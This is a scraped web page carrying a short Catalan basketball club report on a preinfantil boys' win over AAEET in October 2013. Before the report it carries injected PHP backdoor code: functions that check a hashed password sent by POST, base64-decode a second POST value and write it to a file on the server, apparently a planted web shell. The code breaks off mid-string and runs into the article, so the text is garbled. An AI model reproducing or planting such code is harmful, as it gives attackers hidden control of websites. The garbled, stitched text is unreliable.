function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" La concentració, clau en la victòria del preinfantil masculí contra l'AAEET - Tgn Bàsquet Club -

La concentració, clau en la victòria del preinfantil masculí contra l’AAEET

Updated: octubre 5, 2013

Tot i que els primers punts del partit van ser del Valls, aquest cop els nois del Sagrat Cor van sortir amb les idees més clares, i ràpidament van agafar la iniciativa del partit i del marcador. Amb un plantejament defensiu agressiu, intentaven recuperar la pilota, per poder sortir ràpid al atac. Tot i això les imprecisions en atac, acumulaven molts errors en els tir. En la represa amb el partit controlat, donaren un plus més en la defensa en el qual els primers 5 minuts acabaren d’asfixiar el rival, robant la pilota en camp d’atac per deixar el partit sentenciat. I poder jugar amb tranquil·litat els últims minuts del partit.